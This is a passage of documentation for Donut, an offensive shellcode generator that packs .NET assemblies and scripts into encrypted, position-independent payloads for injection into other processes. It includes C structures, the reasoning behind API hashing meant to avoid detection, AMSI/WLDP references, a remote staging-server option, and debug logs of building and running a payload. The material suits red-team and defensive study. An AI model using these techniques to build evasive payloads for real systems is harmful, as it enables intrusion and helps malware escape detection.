71 <td><code>param</code></td>
72 <td>Contains a list of parameters for the .NET method or DLL function. Each separated by semi-colon or comma.</td>
73 </tr>
74 <tr>
75 <td><code>file</code></td>
76 <td>The path of a supported file type: VBS/JS/EXE/DLL or XSL.</td>
77 </tr>
78 <tr>
79 <td><code>url</code></td>
80 <td>If the <code>type</code> is <code>DONUT_INSTANCE_URL</code>, this should contain the server and path of where module will be stored. e.g: https://www.rogueserver.com/modules/</td>
81 </tr>
82 <tr>
83 <td><code>runtime</code></td>
84 <td>The CLR runtime version to use for the .NET assembly. If none is provided, donut will try read from meta header. If that fails, v4.0.30319 is used by default.</td>
85 </tr>
86 <tr>
87 <td><code>modname</code></td>
88 <td>If the <code>type</code> is <code>DONUT_INSTANCE_URL</code>, this will contain a randomly generated name for the module that should be used when saving the contents of <code>mod</code> to disk.</td>
89 </tr>
90 <tr>
91 <td><code>mod_type</code></td>
92 <td>Indicates the type of file detected by <code>DonutCreate</code>. For example, <code>DONUT_MODULE_VBS</code> indicates a VBScript file.</td>
93 </tr>
94 <tr>
95 <td><code>mod_len</code></td>
96 <td>The total size of the <var>Module</var> pointed to by <code>mod</code>.</td>
97 </tr>
98 <tr>
99 <td><code>mod</code></td>
100 <td>Points to encrypted <var>Module</var>. If the <code>type</code> is <code>DONUT_INSTANCE_URL</code>, this should be saved to file using the <code>modname</code> and accessible via HTTP server.</td>
101 </tr>
102 <tr>
103 <td><code>inst_type</code></td>
104 <td><code>DONUT_INSTANCE_PIC</code> indicates a self-contained payload which means the .NET assembly is embedded in executable code. <code>DONUT_INSTANCE_URL</code> indicates the .NET assembly is stored on a remote server with a URL embedded in the instance.</td>
105 </tr>
106 <tr>
107 <td><code>inst_len</code></td>
108 <td>The total size of the <var>Instance</var> pointed to by <code>inst</code>.</td>
109 </tr>
110 <tr>
111 <td><code>inst</code></td>
112 <td>Points to an encrypted <var>Instance</var> after a successful call to <code>DonutCreate</code>. Since it's already attached to the <code>pic</code>, this is only provided for debugging purposes.</td>
113 </tr>
114 <tr>
115 <td><code>pic_len</code></td>
116 <td>The size of data pointed to by <code>pic</code>.</td>
117 </tr>
118 <tr>
119 <td><code>pic</code></td>
120 <td>Points to executable code for the target architecture which also contains an instance. This should be injected into a remote process.</td>
121 </tr>
122 </table>
123
124 <p>Everything that follows here concerns internal workings of Donut and is not required to generate a payload.</p>
125
126 <h3>Instance</h3>
127
128 <p>The position-independent code will always contain an <var>Instance</var> which can be viewed simply as a configuration for the code itself. It will contain all the data that would normally be stored on the stack or in the <code>.data</code> and <code>.rodata</code> sections of an executable. Once the main code executes, it will decrypt the instance before attempting to resolve the address of API functions. If successful, it will check if an executable file is embedded or must be downloaded from a remote staging server. To verify successful decryption of a module, a randomly generated string stored in the <code>sig</code> field is hashed using <var>Maru</var> and compared with the value of <code>mac</code>.</p>
129
130 <pre style='color:#000000;background:#ffffff;'><span style='color:#696969; '>// everything required for an instance goes into the following structure</span>
131 <span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_INSTANCE <span style='color:#800080; '>{</span>
132 uint32_t len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// total size of instance</span>
133 DONUT_CRYPT key<span style='color:#800080; '>;</span> <span style='color:#696969; '>// decrypts instance</span>
134
135 uint64_t iv<span style='color:#800080; '>;</span> <span style='color:#696969; '>// the 64-bit initial value for maru hash</span>
136
137 <span style='color:#800000; font-weight:bold; '>union</span> <span style='color:#800080; '>{</span>
138 uint64_t hash<span style='color:#808030; '>[</span><span style='color:#008c00; '>64</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// holds up to 64 api hashes</span>
139 <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>addr<span style='color:#808030; '>[</span><span style='color:#008c00; '>64</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// holds up to 64 api addresses</span>
140 <span style='color:#696969; '>// include prototypes only if header included from payload.h</span>
141 <span style='color:#004a43; '>&#xa0;&#xa0;&#xa0;&#xa0;&#xa0;&#xa0;</span><span style='color:#004a43; '>#</span><span style='color:#004a43; '>ifdef</span><span style='color:#004a43; '> PAYLOAD_H</span>
142 <span style='color:#800000; font-weight:bold; '>struct</span> <span style='color:#800080; '>{</span>
143 <span style='color:#696969; '>// imports from kernel32.dll or kernelbase.dll</span>
144 LoadLibraryA_t LoadLibraryA<span style='color:#800080; '>;</span>
145 GetProcAddress_t <span style='color:#400000; '>GetProcAddress</span><span style='color:#800080; '>;</span>
146 GetModuleHandleA_t GetModuleHandleA<span style='color:#800080; '>;</span>
147 VirtualAlloc_t <span style='color:#400000; '>VirtualAlloc</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// required to allocate RW memory for instance </span>
148 VirtualFree_t <span style='color:#400000; '>VirtualFree</span><span style='color:#800080; '>;</span>
149 VirtualQuery_t <span style='color:#400000; '>VirtualQuery</span><span style='color:#800080; '>;</span>
150 VirtualProtect_t <span style='color:#400000; '>VirtualProtect</span><span style='color:#800080; '>;</span>
151 Sleep_t <span style='color:#400000; '>Sleep</span><span style='color:#800080; '>;</span>
152 MultiByteToWideChar_t <span style='color:#400000; '>MultiByteToWideChar</span><span style='color:#800080; '>;</span>
153 GetUserDefaultLCID_t <span style='color:#400000; '>GetUserDefaultLCID</span><span style='color:#800080; '>;</span>
154
155 <span style='color:#696969; '>// imports from oleaut32.dll</span>
156 SafeArrayCreate_t SafeArrayCreate<span style='color:#800080; '>;</span>
157 SafeArrayCreateVector_t SafeArrayCreateVector<span style='color:#800080; '>;</span>
158 SafeArrayPutElement_t SafeArrayPutElement<span style='color:#800080; '>;</span>
159 SafeArrayDestroy_t SafeArrayDestroy<span style='color:#800080; '>;</span>
160 SafeArrayGetLBound_t SafeArrayGetLBound<span style='color:#800080; '>;</span>
161 SafeArrayGetUBound_t SafeArrayGetUBound<span style='color:#800080; '>;</span>
162 SysAllocString_t SysAllocString<span style='color:#800080; '>;</span>
163 SysFreeString_t SysFreeString<span style='color:#800080; '>;</span>
164 LoadTypeLib_t LoadTypeLib<span style='color:#800080; '>;</span>
165
166 <span style='color:#696969; '>// imports from wininet.dll</span>
167 InternetCrackUrl_t InternetCrackUrl<span style='color:#800080; '>;</span>
168 InternetOpen_t InternetOpen<span style='color:#800080; '>;</span>
169 InternetConnect_t InternetConnect<span style='color:#800080; '>;</span>
170 InternetSetOption_t InternetSetOption<span style='color:#800080; '>;</span>
171 InternetReadFile_t InternetReadFile<span style='color:#800080; '>;</span>
172 InternetCloseHandle_t InternetCloseHandle<span style='color:#800080; '>;</span>
173 HttpOpenRequest_t HttpOpenRequest<span style='color:#800080; '>;</span>
174 HttpSendRequest_t HttpSendRequest<span style='color:#800080; '>;</span>
175 HttpQueryInfo_t HttpQueryInfo<span style='color:#800080; '>;</span>
176
177 <span style='color:#696969; '>// imports from mscoree.dll</span>
178 CorBindToRuntime_t CorBindToRuntime<span style='color:#800080; '>;</span>
179 CLRCreateInstance_t CLRCreateInstance<span style='color:#800080; '>;</span>
180
181 <span style='color:#696969; '>// imports from ole32.dll</span>
182 CoInitializeEx_t CoInitializeEx<span style='color:#800080; '>;</span>
183 CoCreateInstance_t CoCreateInstance<span style='color:#800080; '>;</span>
184 CoUninitialize_t CoUninitialize<span style='color:#800080; '>;</span>
185 <span style='color:#800080; '>}</span><span style='color:#800080; '>;</span>
186 <span style='color:#004a43; '>&#xa0;&#xa0;&#xa0;&#xa0;&#xa0;&#xa0;</span><span style='color:#004a43; '>#</span><span style='color:#004a43; '>endif</span>
187 <span style='color:#800080; '>}</span> api<span style='color:#800080; '>;</span>
188
189 <span style='color:#696969; '>// everything from here is encrypted</span>
190 <span style='color:#800000; font-weight:bold; '>int</span> api_cnt<span style='color:#800080; '>;</span> <span style='color:#696969; '>// the 64-bit hashes of API required for instance to work</span>
191 <span style='color:#800000; font-weight:bold; '>int</span> dll_cnt<span style='color:#800080; '>;</span> <span style='color:#696969; '>// the number of DLL to load before resolving API</span>
192 <span style='color:#800000; font-weight:bold; '>char</span> dll_name<span style='color:#808030; '>[</span>DONUT_MAX_DLL<span style='color:#808030; '>]</span><span style='color:#808030; '>[</span><span style='color:#008c00; '>32</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// a list of DLL strings to load</span>
193
194 <span style='color:#800000; font-weight:bold; '>union</span> <span style='color:#800080; '>{</span>
195 <span style='color:#800000; font-weight:bold; '>char</span> s<span style='color:#808030; '>[</span><span style='color:#008c00; '>8</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// amsi.dll</span>
196 uint32_t w<span style='color:#808030; '>[</span><span style='color:#008c00; '>2</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span>
197 <span style='color:#800080; '>}</span> amsi<span style='color:#800080; '>;</span>
198
199 <span style='color:#800000; font-weight:bold; '>char</span> clr<span style='color:#808030; '>[</span><span style='color:#008c00; '>8</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// clr.dll</span>
200 <span style='color:#800000; font-weight:bold; '>char</span> wldp<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// wldp.dll</span>
201 <span style='color:#800000; font-weight:bold; '>char</span> wldpQuery<span style='color:#808030; '>[</span><span style='color:#008c00; '>32</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// WldpQueryDynamicCodeTrust</span>
202 <span style='color:#800000; font-weight:bold; '>char</span> wldpIsApproved<span style='color:#808030; '>[</span><span style='color:#008c00; '>32</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// WldpIsClassInApprovedList</span>
203
204 <span style='color:#800000; font-weight:bold; '>char</span> amsiInit<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// AmsiInitialize</span>
205 <span style='color:#800000; font-weight:bold; '>char</span> amsiScanBuf<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// AmsiScanBuffer</span>
206 <span style='color:#800000; font-weight:bold; '>char</span> amsiScanStr<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// AmsiScanString</span>
207
208 uint16_t wscript<span style='color:#808030; '>[</span><span style='color:#008c00; '>8</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// WScript</span>
209 uint16_t wscript_exe<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// wscript.exe</span>
210
211 <span style='color:#603000; '>GUID</span> xIID_IUnknown<span style='color:#800080; '>;</span>
212 <span style='color:#603000; '>GUID</span> xIID_IDispatch<span style='color:#800080; '>;</span>
213
214 <span style='color:#696969; '>// GUID required to load .NET assemblies</span>
215 <span style='color:#603000; '>GUID</span> xCLSID_CLRMetaHost<span style='color:#800080; '>;</span>
216 <span style='color:#603000; '>GUID</span> xIID_ICLRMetaHost<span style='color:#800080; '>;</span>
217 <span style='color:#603000; '>GUID</span> xIID_ICLRRuntimeInfo<span style='color:#800080; '>;</span>
218 <span style='color:#603000; '>GUID</span> xCLSID_CorRuntimeHost<span style='color:#800080; '>;</span>
219 <span style='color:#603000; '>GUID</span> xIID_ICorRuntimeHost<span style='color:#800080; '>;</span>
220 <span style='color:#603000; '>GUID</span> xIID_AppDomain<span style='color:#800080; '>;</span>
221
222 <span style='color:#696969; '>// GUID required to run VBS and JS files</span>
223 <span style='color:#603000; '>GUID</span> xCLSID_ScriptLanguage<span style='color:#800080; '>;</span> <span style='color:#696969; '>// vbs or js</span>
224 <span style='color:#603000; '>GUID</span> xIID_IHost<span style='color:#800080; '>;</span> <span style='color:#696969; '>// wscript object</span>
225 <span style='color:#603000; '>GUID</span> xIID_IActiveScript<span style='color:#800080; '>;</span> <span style='color:#696969; '>// engine</span>
226 <span style='color:#603000; '>GUID</span> xIID_IActiveScriptSite<span style='color:#800080; '>;</span> <span style='color:#696969; '>// implementation</span>
227 <span style='color:#603000; '>GUID</span> xIID_IActiveScriptParse32<span style='color:#800080; '>;</span> <span style='color:#696969; '>// parser</span>
228 <span style='color:#603000; '>GUID</span> xIID_IActiveScriptParse64<span style='color:#800080; '>;</span>
229
230 <span style='color:#696969; '>// GUID required to run XSL files</span>
231 <span style='color:#603000; '>GUID</span> xCLSID_DOMDocument30<span style='color:#800080; '>;</span>
232 <span style='color:#603000; '>GUID</span> xIID_IXMLDOMDocument<span style='color:#800080; '>;</span>
233 <span style='color:#603000; '>GUID</span> xIID_IXMLDOMNode<span style='color:#800080; '>;</span>
234
235 <span style='color:#800000; font-weight:bold; '>int</span> type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// DONUT_INSTANCE_PIC or DONUT_INSTANCE_URL </span>
236
237 <span style='color:#800000; font-weight:bold; '>struct</span> <span style='color:#800080; '>{</span>
238 <span style='color:#800000; font-weight:bold; '>char</span> url<span style='color:#808030; '>[</span>DONUT_MAX_URL<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// staging server hosting donut module</span>
239 <span style='color:#800000; font-weight:bold; '>char</span> req<span style='color:#808030; '>[</span><span style='color:#008c00; '>8</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// just a buffer for "GET"</span>
240 <span style='color:#800080; '>}</span> http<span style='color:#800080; '>;</span>
241
242 uint8_t sig<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// string to hash</span>
243 uint64_t mac<span style='color:#800080; '>;</span> <span style='color:#696969; '>// to verify decryption ok</span>
244
245 DONUT_CRYPT mod_key<span style='color:#800080; '>;</span> <span style='color:#696969; '>// used to decrypt module</span>
246 uint64_t mod_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// total size of module</span>
247
248 <span style='color:#800000; font-weight:bold; '>union</span> <span style='color:#800080; '>{</span>
249 PDONUT_MODULE p<span style='color:#800080; '>;</span> <span style='color:#696969; '>// for URL</span>
250 DONUT_MODULE x<span style='color:#800080; '>;</span> <span style='color:#696969; '>// for PIC</span>
251 <span style='color:#800080; '>}</span> module<span style='color:#800080; '>;</span>
252 <span style='color:#800080; '>}</span> DONUT_INSTANCE<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_INSTANCE<span style='color:#800080; '>;</span>
253 </pre>
254
255 <h3>Module</h3>
256
257 <p>Modules can be embedded in an <var>Instance</var> or stored on a remote HTTP server.</p>
258
259 <pre style='color:#000000;background:#ffffff;'><span style='color:#696969; '>// everything required for a module goes in the following structure</span>
260 <span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_MODULE <span style='color:#800080; '>{</span>
261 <span style='color:#603000; '>DWORD</span> type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// EXE, DLL, JS, VBS, XSL</span>
262 <span style='color:#603000; '>WCHAR</span> runtime<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// runtime version for .NET EXE/DLL</span>
263 <span style='color:#603000; '>WCHAR</span> domain<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// domain name to use for .NET EXE/DLL</span>
264 <span style='color:#603000; '>WCHAR</span> cls<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of class and optional namespace for .NET EXE/DLL</span>
265 <span style='color:#603000; '>WCHAR</span> method<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of method to invoke for .NET DLL or api for unmanaged DLL</span>
266 <span style='color:#603000; '>DWORD</span> param_cnt<span style='color:#800080; '>;</span> <span style='color:#696969; '>// number of parameters for DLL/EXE</span>
267 <span style='color:#603000; '>WCHAR</span> param<span style='color:#808030; '>[</span>DONUT_MAX_PARAM<span style='color:#808030; '>]</span><span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// string parameters for DLL/EXE</span>
268 <span style='color:#603000; '>CHAR</span> sig<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// random string to verify decryption</span>
269 ULONG64 mac<span style='color:#800080; '>;</span> <span style='color:#696969; '>// to verify decryption was ok</span>
270 ULONG64 len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of EXE/DLL/XSL/JS/VBS file</span>
271 <span style='color:#603000; '>BYTE</span> data<span style='color:#808030; '>[</span><span style='color:#008c00; '>4</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// data of EXE/DLL/XSL/JS/VBS file</span>
272 <span style='color:#800080; '>}</span> DONUT_MODULE<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_MODULE<span style='color:#800080; '>;</span>
273 </pre>
274
275 <h3>API Hashing</h3>
276
277 <p>A hash function called <em>Maru</em> is used to resolve the address of API at runtime. It uses a Davies-Meyer construction and the SPECK block cipher to derive a 64-bit hash from an API string. The padding is similar to what's used by MD4 and MD5 except only 32-bits of the string length are stored in the buffer instead of 64-bits. An initial value (IV) chosen randomly ensures the 64-bit API hashes are unique for each instance and cannot be used for detection of Donut. Future releases will likely support alternative methods of resolving address of API to decrease chance of detection.</p>
278
279 <h3>Encryption</h3>
280
281 <p>The following structure is used to hold a master key, counter and nonce for Donut, which are generated randomly.</p>
282
283 <pre style='color:#000000;background:#ffffff;'><span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_CRYPT <span style='color:#800080; '>{</span>
284 <span style='color:#603000; '>BYTE</span> mk<span style='color:#808030; '>[</span>DONUT_KEY_LEN<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// master key</span>
285 <span style='color:#603000; '>BYTE</span> ctr<span style='color:#808030; '>[</span>DONUT_BLK_LEN<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// counter + nonce</span>
286 <span style='color:#800080; '>}</span> DONUT_CRYPT<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_CRYPT<span style='color:#800080; '>;</span>
287 </pre>
288
289 <p>Chaskey, a 128-bit block cipher with support for 128-bit keys, is used in Counter (CTR) mode to decrypt a <var>Module</var> or an <var>Instance</var> at runtime. If an adversary discovers a staging server, it should not be feasible for them to decrypt a donut module without the key which is stored in the donut payload. </p>
290
291 <h3>Debugging payload</h3>
292
293 <p>The payload is capable of displaying detailed information about each step executing a file in-memory and can be useful in tracking down bugs. To build a debug-enabled executable, specify the debug label with nmake/make for both donut.c and payload.c.</p>
294
295 <pre>
296 nmake debug -f Makefile.msvc
297 make debug -f Makefile.mingw
298 </pre>
299
300 <p>Use donut to create a payload as you normally would and a file called <code>instance</code> will be saved to disk.</p>
301
302 <pre>
303 c:\hub\donut>donut -fClass1.dll -cTestClass -mRunProcess -pcalc.exe,notepad.exe
304
305 [ Donut shellcode generator v0.9.2
306 [ Copyright (c) 2019 TheWover, Odzhan
307
308 DEBUG: donut.c:822:DonutCreate(): Entering.
309 DEBUG: donut.c:824:DonutCreate(): Validating configuration and path of file
310 DEBUG: donut.c:840:DonutCreate(): Validating instance type
311 DEBUG: donut.c:880:DonutCreate(): Validating architecture
312 DEBUG: donut.c:277:get_file_info(): Entering.
313 DEBUG: donut.c:286:get_file_info(): Checking extension of Class1.dll
314 DEBUG: donut.c:293:get_file_info(): Extension is ".dll"
315 DEBUG: donut.c:320:get_file_info(): Module is DLL
316 DEBUG: donut.c:327:get_file_info(): Mapping Class1.dll into memory
317 DEBUG: donut.c:222:map_file(): Reading size of file : Class1.dll
318 DEBUG: donut.c:231:map_file(): Opening Class1.dll
319 DEBUG: donut.c:241:map_file(): Mapping 3072 bytes for Class1.dll
320 DEBUG: donut.c:336:get_file_info(): Checking DOS header
321 DEBUG: donut.c:342:get_file_info(): Checking NT header
322 DEBUG: donut.c:348:get_file_info(): Checking IMAGE_DATA_DIRECTORY
323 DEBUG: donut.c:356:get_file_info(): Checking characteristics
324 DEBUG: donut.c:368:get_file_info(): COM Directory found
325 DEBUG: donut.c:384:get_file_info(): Runtime version : v4.0.30319
326 DEBUG: donut.c:395:get_file_info(): Leaving.
327 DEBUG: donut.c:944:DonutCreate(): Creating module
328 DEBUG: donut.c:516:CreateModule(): Entering.
329 DEBUG: donut.c:520:CreateModule(): Allocating 9504 bytes of memory for DONUT_MODULE
330 DEBUG: donut.c:544:CreateModule(): Domain : TPYTXT7T
331 DEBUG: donut.c:549:CreateModule(): Class : TestClass
332 DEBUG: donut.c:552:CreateModule(): Method : RunProcess
333 DEBUG: donut.c:559:CreateModule(): Runtime : v4.0.30319
334 DEBUG: donut.c:584:CreateModule(): Adding "calc.exe"
335 DEBUG: donut.c:584:CreateModule(): Adding "notepad.exe"
336 DEBUG: donut.c:610:CreateModule(): Leaving.
337 DEBUG: donut.c:951:DonutCreate(): Creating instance
338 DEBUG: donut.c:621:CreateInstance(): Entering.
339 DEBUG: donut.c:624:CreateInstance(): Allocating space for instance
340 DEBUG: donut.c:631:CreateInstance(): The size of module is 9504 bytes. Adding to size of instance.
341 DEBUG: donut.c:643:CreateInstance(): Generating random key for instance
342 DEBUG: donut.c:649:CreateInstance(): Generating random key for module
343 DEBUG: donut.c:655:CreateInstance(): Generating random string to verify decryption
344 DEBUG: donut.c:661:CreateInstance(): Generating random IV for Maru hash
345 DEBUG: donut.c:666:CreateInstance(): Generating hashes for API using IV: 59e4ea34bad26f10
346 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : LoadLibraryA = 710C9DA8846AE821
347 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : GetProcAddress = 2334B1630D3B9C85
348 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : GetModuleHandleA = 5389E01382E0391
349 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualAlloc = 51EE6B0DB215095E
350 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualFree = F55A2169F30A6ED4
351 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualQuery = 22DB7628044F6E32
352 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualProtect = 688AA07FEF250016
353 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : Sleep = 5BF1C1B408CCA4A5
354 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : MultiByteToWideChar = 438AD242BBBC755
355 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : GetUserDefaultLCID = 33ED1B2C1A2F9EC7
356 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayCreate = 78AD2BFB55A5E7ED
357 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayCreateVector = 539F6582DE26F7BC
358 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayPutElement = 5057AD641F749DA0
359 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayDestroy = A63C510FF032080E
360 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayGetLBound = A37979CE2EEDDA6
361 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayGetUBound = 64A9C62452B8653C
362 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SysAllocString = BFEEAAB6CE6017FB
363 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SysFreeString = E6FD34B03A2701F6
364 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : LoadTypeLib = 2A33214873ADC58C
365 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetCrackUrlA = 1ADE3553184C68E1
366 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetOpenA = 1DEDE3D32F2FCD3
367 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetConnectA = 781FD6B18C99CAD2
368 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetSetOptionA = 13EC8A292778FC3F
369 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetReadFile = 8D16E60E7C2E582A
370 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetCloseHandle = C28E8A3AABB2A755
371 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : HttpOpenRequestA = 6C5189610A8545F5
372 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : HttpSendRequestA = 4DFA0D985988D31
373 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : HttpQueryInfoA = ED09A37256B27F04
374 DEBUG: donut.c:679:CreateInstance(): Hash for mscoree.dll : CorBindToRuntime = FD669FABED4C6B7
375 DEBUG: donut.c:679:CreateInstance(): Hash for mscoree.dll : CLRCreateInstance = 56B7AC5C110570B5
376 DEBUG: donut.c:679:CreateInstance(): Hash for ole32.dll : CoInitializeEx = 3733F4734D12D7C
377 DEBUG: donut.c:679:CreateInstance(): Hash for ole32.dll : CoCreateInstance = FCB3EAC51E43319B
378 DEBUG: donut.c:679:CreateInstance(): Hash for ole32.dll : CoUninitialize = 908A347B45C6E4A2
379 DEBUG: donut.c:694:CreateInstance(): Copying GUID structures and DLL strings for loading .NET assemblies
380 DEBUG: donut.c:791:CreateInstance(): Copying module data to instance
381 DEBUG: donut.c:796:CreateInstance(): encrypting instance
382 DEBUG: donut.c:808:CreateInstance(): Leaving.
383 DEBUG: donut.c:959:DonutCreate(): Saving instance to file
384 DEBUG: donut.c:992:DonutCreate(): PIC size : 33050
385 DEBUG: donut.c:999:DonutCreate(): Inserting opcodes
386 DEBUG: donut.c:1035:DonutCreate(): Copying 15218 bytes of x86 + amd64 shellcode
387 DEBUG: donut.c:259:unmap_file(): Unmapping
388 DEBUG: donut.c:262:unmap_file(): Closing
389 DEBUG: donut.c:1061:DonutCreate(): Leaving.
390 [ Instance type : PIC
391 [ Module file : "Class1.dll"
392 [ File type : .NET DLL
393 [ Class : TestClass
394 [ Method : RunProcess
395 [ Parameters : calc.exe,notepad.exe
396 [ Target CPU : x86+AMD64
397 [ Shellcode : "payload.bin"
398
399 DEBUG: donut.c:1069:DonutDelete(): Entering.
400 DEBUG: donut.c:1088:DonutDelete(): Leaving.
401 </pre>
402
403 <p>Pass the instance as a parameter to payload.exe and it will run on the host system as if in a target environment.</p>
404
405 <pre>
406 c:\hub\donut\payload>payload ..\instance
407 Running...
408 DEBUG: payload.c:45:ThreadProc(): Maru IV : 1899033E0863343E
409 DEBUG: payload.c:48:ThreadProc(): Resolving address for VirtualAlloc() : 9280348A6A2AFA7
410 DEBUG: payload.c:52:ThreadProc(): Resolving address for VirtualAlloc() : 3A49032E4107D985
411 DEBUG: payload.c:61:ThreadProc(): VirtualAlloc : 77535ED0 VirtualFree : 77535EF0
412 DEBUG: payload.c:63:ThreadProc(): Allocating 17800 bytes of RW memory
413 DEBUG: payload.c:70:ThreadProc(): Copying 17800 bytes of data to memory 008D0000
414 DEBUG: payload.c:74:ThreadProc(): Zero initializing PDONUT_ASSEMBLY
415 DEBUG: payload.c:82:ThreadProc(): Decrypting 17800 bytes of instance
416 DEBUG: payload.c:89:ThreadProc(): Generating hash to verify decryption
417 DEBUG: payload.c:91:ThreadProc(): Instance : c16c69caa83fb13f | Result : c16c69caa83fb13f
418 DEBUG: payload.c:98:ThreadProc(): Resolving LoadLibraryA
419 DEBUG: payload.c:104:ThreadProc(): Loading ole32.dll ...
420 DEBUG: payload.c:104:ThreadProc(): Loading oleaut32.dll ...
421 DEBUG: payload.c:104:ThreadProc(): Loading wininet.dll ...
422 DEBUG: payload.c:104:ThreadProc(): Loading mscoree.dll ...
423 DEBUG: payload.c:108:ThreadProc(): Resolving 33 API
424 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 066A0ED9815D3C92
425 DEBUG: payload.c:111:ThreadProc(): Resolving API address for F3569749C64E1DA5
426 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 09280348A6A2AFA7
427 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 3A49032E4107D985
428 DEBUG: payload.c:111:ThreadProc(): Resolving API address for FDE50FEB629EB834
429 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 4A4C764EFA89A84F
430 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 5D388BA18E017E53
431 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 4EA2B25D8FAABD2B
432 DEBUG: payload.c:111:ThreadProc(): Resolving API address for F1D278132E49F050
433 DEBUG: payload.c:111:ThreadProc(): Resolving API address for D05386A0F8FF7CAD
434 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 8121B63764A390A6
435 DEBUG: payload.c:111:ThreadProc(): Resolving API address for EB2BFAA408124470
